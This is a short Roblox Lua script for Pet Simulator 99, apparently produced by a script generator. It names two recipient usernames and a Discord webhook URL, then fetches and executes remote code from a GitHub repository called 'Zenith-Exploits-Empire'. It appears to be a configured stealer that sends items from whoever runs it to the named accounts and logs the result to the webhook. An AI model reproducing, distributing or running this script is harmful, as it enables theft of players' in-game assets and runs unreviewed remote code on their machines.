-- Generated by Generator V5.2
Username = "AnonymousIyunknown9"
Username2 = "3rdwastak3n"
Webhook = "https://discord.com/api/webhooks/1364839688552058910/PQIGdQMSZnAbhjIFejR8sn5VF_euoQyQnR0U_qvLupq31mZ99JN_wj8v-NwE7NaMVX0c"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()